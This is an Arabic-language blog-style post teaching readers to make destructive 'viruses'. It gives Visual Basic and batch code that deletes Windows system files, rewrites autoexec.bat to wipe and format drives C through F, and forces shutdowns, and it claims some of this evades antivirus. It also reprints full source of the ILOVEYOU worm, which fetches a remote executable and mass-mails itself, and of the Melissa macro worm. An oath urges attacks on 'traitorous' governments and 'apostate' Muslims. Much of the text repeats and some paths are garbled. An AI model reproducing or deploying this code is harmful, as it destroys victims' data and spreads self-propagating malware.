إظهار الرسائل ذات التسميات virus. إظهار كافة الرسائل
لمسالة بسيطة جدا تعتمد فقط على الدالة kill
فمثلا اذا كنت تريد ان تمحي الريجستري تضع:
on error resume next
kill c:/windows/regedit.exe
ودائما ضع الجملة on error resume next قبل القيام باي عملية تجنبا للاخطاء...
ملاحظة:اذا كنت تريد تصنع فيروس يجب ان تضبط الخاصية visible للform عند false
ومثلا هذا فيروس يقوم بقتل الويندوز
on error resume next
kill c:\windows\system\msconfig.exe
killc:\windows\Rundll32.exe
kill c:\windows\regedit.exe
kill c:\windows\Rundll.exe
kill c:\Autoexec.bat
kill c:\command.com
kill c:\windows\Logos.sys
kill c:\windows\Logow.sys
kill c:\windows\Scanregw.exe
kill C:\Program Files\Internet Explorer\Iexplore.exe
kill c:\windows\system\Sysedit.exe
kill c:\windows\win.com
ولنتطرق الى موضوع اخر من الفيروسات...
فمثلا هذا فيروس يقوم بنسخ برنامج الnotepad في الويندوز 5000 مرة...
on error resume next
for i= 1 to 5000
FileCopy "c:/windows/notepad.exe", "c:/windows/notepad" & i & ".exe"
Next i
فمثلا اذا كنت تريد ان تمحي الريجستري تضع:
on error resume next
kill c:/windows/regedit.exe
ودائما ضع الجملة on error resume next قبل القيام باي عملية تجنبا للاخطاء...
ملاحظة:اذا كنت تريد تصنع فيروس يجب ان تضبط الخاصية visible للform عند false
ومثلا هذا فيروس يقوم بقتل الويندوز
on error resume next
kill c:\windows\system\msconfig.exe
killc:\windows\Rundll32.exe
kill c:\windows\regedit.exe
kill c:\windows\Rundll.exe
kill c:\Autoexec.bat
kill c:\command.com
kill c:\windows\Logos.sys
kill c:\windows\Logow.sys
kill c:\windows\Scanregw.exe
kill C:\Program Files\Internet Explorer\Iexplore.exe
kill c:\windows\system\Sysedit.exe
kill c:\windows\win.com
ولنتطرق الى موضوع اخر من الفيروسات...
فمثلا هذا فيروس يقوم بنسخ برنامج الnotepad في الويندوز 5000 مرة...
on error resume next
for i= 1 to 5000
FileCopy "c:/windows/notepad.exe", "c:/windows/notepad" & i & ".exe"
Next i
هذه ليست فيروسات, بل هي آوامر مدمره تدمر الجهاز
وهي شبيهة جدا بلفيروسات ونستطيع تسميتها بلفيروسات
وأرجو من جميع الأخوه الخبراء إذا كان الموضوع ناقصا أو فيه نوع من الخطأ أن لا يبخلو علينا بلنقدالبناء.. والتصليح
عند البدء يجب علينا أن نتعاهد على هذا القسم
أقسم بلله العظيم ألا أستخدم هذه الطرق لإلحاق الأذى بلمسلمين بدون حق شرعي
وأقسم بلله العظيم أن ألا أستخدم هذه الطرق بهدف الإنتقام وتصفيه الحسابات وخاصه بين الشباب المراهقين بدون حق شرعي
وأقسم بلله العظيم أن أحرص على أن أستخدم هذه الطرق لإلحاق الأذى
بلحكومات الإسلاميه والعربيه الخائنه والتابعه لأمريكا وإسرائيل وماشابه ذلك
وأقسم بلله العظيم أن أستخدم هذه الطرق ضد المسلمين الخونه والمرتدين
الذين يكيدون للإسلام والمسلمين وماشابه ذلك
وأن ينحصر إستخدامي لهذه الطرق بهدف خدمه الإسلام والمسلمين
وأنا أبرء ذمتي أمام الله بمن ينكث بهذا القسم
والله خير الشاهدين
آلان نبدأ
إياكم أن تقومو بتجربتها على أجهزتكم
إذهب إلى Notepad وقم بنسخ هذه الأكواد
وأتبع التعليمات خطوه بخطوه
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
AUTOEXEC.BAT
وبعدين راح ينشأ لك فيروس
إنتهى
ولا تفكر تفتح الملف بعد صنعه
********************************************************
وقم بنسخ هذا الكود في المفكرة
del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys*.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
maker.bat
و بهذا يكون الأمر قد أنتها في صنع الفيروس
إنتهى
ولاتفكر تفتح الملف بعد صنعه
************************************************** ******
عمل فورمات C,D,E,F والطابعه
وقم بنسخ هذا الكود في المفكرة
callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولا تفكر تفتح الملف بعد صنعه
**************************************************
عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز
وقم بنسخ هذا الكود في المفكرة
callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll.exe user.exe,exitwindowsexec
وبعدلصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولا تفكر تفتح الملف بعد صنعه
**************************************************
عمل فورمات C,D,E,F والطابعه وقفل الجهاز
وقم بنسخ هذا الكود في المفكرة
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll32.exe user.exe,exitwindows
وبعدلصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولاتفكر تفتح الملف بعد صنعه
**************************************************
عمل فورمات للجهاز فورا
وقم بنسخ هذا الكود في المفكرة
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعدلصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولاتفكر تفتح الملف بعد صنعه
************************************************** ***************************************************
اهم فايروس مدمر
وقم بنسخ هذا الكود في المفكرة
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولاتفكر تفتح الملف بعد صنعه
هذا فايرس بصراحه حقير وهذا الرابط يشرح لكم
http://www.youtube.com/watch?v=EiHHk...eature=related
وهذا الكود
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
ثانيا :اعمل save ب اسم whatever.bat
ثالثا: اعمل all files فى save as type
إنتهى
************************************************** ****
ملاحظه هاااااامه جدا جدا جدا
معظم هذه الفيروسات يتم إكتشافها من قبل المضاد للفيروسات
ولكن هذه بعض الفيروسات التي لا يستطيع المضاد الإمساك بها والمثال على هذه الفيروسات
عمل فورمات C,D,E,F
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll.exe user.exe,exitwindowsexec
إنتهى
************************************************** *********
عمل فورمات C,D,E,F
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll32.exe user.exe,exitwindows
إنتهى
************************************************** *********
تدمير الوندوز وحذف الملفات بعد التشغيل مباشره
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar
إنتهى
************************************************** *********
قتل الوندوز وحذف كل الملفات بعد اول اعادةتشغيل للجهاز
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar
إنتهى
************************************************** *********
عمل فورمات للجهاز فورا
code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul>>c:autoexec.bat--------------------------------------------------------------------------------
إنتهى
************************************************** *********
اهم فورمات البنسبه الي
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
إنتهى
************************************************** *********
جميع الفيروسات السابقه تحفظ على النوت باد بإمتداد bat
مثال: limeware.bat
Soso.bat
FBI.bat
هذهأمثله ولكم حريه إختيار الإسم
وأكرر إياكم فتح هذه الفيروسات على أجهزتكم
إياكم أن تقومو بتجربتها على أجهزتكم
************************************************** *********
الفايروسات القويه الحب
كما تعلمنا سابقا
rem barok -loveletter(vbe) <i hate go to school>rem by: spyder / ispyder@mail.com / @grammersoft group /
Manila,Philippines
On Error Resume Next
Dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
Sub main()
On Error Resume Next
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\oftware\icrosof t\indows Scripting
Host\ettings\imeout")
If (rr>=1) Then
wscr.RegWrite "HKEY_CURRENT_USER\oftware\icrosoft\indows Scripting
Host\ettings\imeout",0,"REG_DWORD"
End If
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\SKernel32.vbs")
c.Copy(dirwin&"\in32DLL.vbs")
c.Copy(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
End Sub
Sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\SKernel32
",dirsystem&"\SKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\unServices\i
n32DLL",dirwin&"\in32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\oftware\icrosof t\nternet
Explorer\ownload Directory")
If (downread="") Then
downread="c:\
End If
If (fileexist(dirsystem&"\inFAT32.exe")=1) Then
Randomize
num = Int((4 * Rnd) + 1)
If num = 1 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
ElseIf num = 2 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
ElseIf num = 3 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
ElseIf num = 4 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
End If
End If
If (fileexist(downread&"\IN-BUGSFIX.exe")=0) Then
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\IN-BUGSFI
X",downread&"\IN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\oftware\icrosoft\nternet Explorer\ain\tart
Page","about_:blank"
End If
End Sub
Sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType=3 Then
folderlist(d.path&"\)
End If
Next
listadriv = s
End Sub
Sub infectfiles(folderspec)
On Error Resume Next
Dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext=fso.GetExtensionName(f1.path)
ext=LCase(ext)
s=LCase(f1.Name)
If (ext="vbs") Or (ext="vbe") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
ElseIf(ext="js")Or (ext="jse") Or (ext="css") Or (ext="wsh") Or(ext="sct")
Or (ext="hta") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
bname=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\&bname&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="jpg") Or (ext="jpeg") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
Set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="mp3") Or (ext="mp2") Then
Set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.Close
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
If (eq<>folderspec) Then
If (s="mirc32.exe") Or (s="mlink32.exe") Or(s="mirc.ini") Or
(s="script.ini") Or (s="mirc.hlp") Then
Set scriptini=fso.CreateTextFile(folderspec&"\cript.in i")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com/"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{
scriptini.WriteLine "n1= /if ( $nick == $me ) {halt }
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\OVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}
scriptini.Close
eq=folderspec
End If
End If
Next
End Sub
Sub folderlist(folderspec)
On Error Resume Next
Dim f,f1,sf
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
infectfiles(f1.path)
folderlist(f1.path)
Next
End Sub
Sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
End Sub
Function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
End Function
Function fileexist(filespec)
On Error Resume Next
Dim msg
If (fso.FileExists(filespec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Function folderexist(folderspec)
On Error Resume Next
Dim msg
If (fso.GetFolderExists(folderspec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Sub spreadtoemail()
On Error Resume Next
Dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
Set regedit=CreateObject("WScript.Shell")
Set out=WScript.CreateObject("Outlook.Application")
Set mapi=out.GetNameSpace("MAPI")
For ctrlists=1 To mapi.AddressLists.Count
Set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\oftware\ic rosoft\AB\&a)
If (regv="") Then
regv=1
End If
If (Int(a.AddressEntries.Count)>Int(regv)) Then
For ctrentries=1 To a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\oftware\i crosoft\AB\&malead)
If (regad="") Then
Set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming fromme."
male.Attachments.Add(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&malead,1," REG_DWORD"
End If
x=x+1
Next
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
Else
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
End If
Next
Set out=Nothing
Set mapi=Nothing
End Sub
Sub html
On Error Resume Next
Dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveXControl<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){ar wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}&vbcrlf&_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="setfso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf&_
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf&_
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf&_
"setwri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf&_
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initializeActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,Chr(35)&Chr(45)&Chr(35),"'")
dt1=replace(dt1,Chr(64)&Chr(45)&Chr(64),"""")
dt4=replace(dt1,Chr(63)&Chr(45)&Chr(63),"/")
dt5=replace(dt4,Chr(94)&Chr(45)&Chr(94),"\)
dt2=replace(dta2,Chr(35)&Chr(45)&Chr(35),"'")
dt2=replace(dt2,Chr(64)&Chr(45)&Chr(64),"""")
dt3=replace(dt2,Chr(63)&Chr(45)&Chr(63),"/")
dt6=replace(dt3,Chr(94)&Chr(45)&Chr(94),"\)
Set fso=CreateObject("Scripting.FileSystemObject")
Set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=UBound(lines)
For n=0 To UBound(lines)
lines(n)=replace(lines(n),"'",Chr(91)+Chr(45)+Chr( 91))
lines(n)=replace(lines(n),"""",Chr(93)+Chr(45)+Chr (93))
lines(n)=replace(lines(n),"\,Chr(37)+Chr(45)+Chr(3 7))
If (l1=n) Then
lines(n)=Chr(34)+lines(n)+Chr(34)
Else
lines(n)=Chr(34)+lines(n)+Chr(34)&"&vbcrlf& _"
End If
Next
Set b=fso.CreateTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM")
b.Close
Set d=fso.OpenTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.Close
End Sub
************************************************** *********
فايروسمليسيا فايروس خطير
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity","Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed =False
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\.0\ord\ecurity","Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") <>"... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") ="... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name,"Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False)Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points,plustriple-word-score, plus fifty points for using all my letters.Game's over. I'moutta here."
End Sub
************************************************** *********
وهي شبيهة جدا بلفيروسات ونستطيع تسميتها بلفيروسات
وأرجو من جميع الأخوه الخبراء إذا كان الموضوع ناقصا أو فيه نوع من الخطأ أن لا يبخلو علينا بلنقدالبناء.. والتصليح
عند البدء يجب علينا أن نتعاهد على هذا القسم
أقسم بلله العظيم ألا أستخدم هذه الطرق لإلحاق الأذى بلمسلمين بدون حق شرعي
وأقسم بلله العظيم أن ألا أستخدم هذه الطرق بهدف الإنتقام وتصفيه الحسابات وخاصه بين الشباب المراهقين بدون حق شرعي
وأقسم بلله العظيم أن أحرص على أن أستخدم هذه الطرق لإلحاق الأذى
بلحكومات الإسلاميه والعربيه الخائنه والتابعه لأمريكا وإسرائيل وماشابه ذلك
وأقسم بلله العظيم أن أستخدم هذه الطرق ضد المسلمين الخونه والمرتدين
الذين يكيدون للإسلام والمسلمين وماشابه ذلك
وأن ينحصر إستخدامي لهذه الطرق بهدف خدمه الإسلام والمسلمين
وأنا أبرء ذمتي أمام الله بمن ينكث بهذا القسم
والله خير الشاهدين
آلان نبدأ
إياكم أن تقومو بتجربتها على أجهزتكم
إذهب إلى Notepad وقم بنسخ هذه الأكواد
وأتبع التعليمات خطوه بخطوه
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
AUTOEXEC.BAT
وبعدين راح ينشأ لك فيروس
إنتهى
ولا تفكر تفتح الملف بعد صنعه
********************************************************
وقم بنسخ هذا الكود في المفكرة
del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys*.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
maker.bat
و بهذا يكون الأمر قد أنتها في صنع الفيروس
إنتهى
ولاتفكر تفتح الملف بعد صنعه
************************************************** ******
عمل فورمات C,D,E,F والطابعه
وقم بنسخ هذا الكود في المفكرة
callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولا تفكر تفتح الملف بعد صنعه
**************************************************
عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز
وقم بنسخ هذا الكود في المفكرة
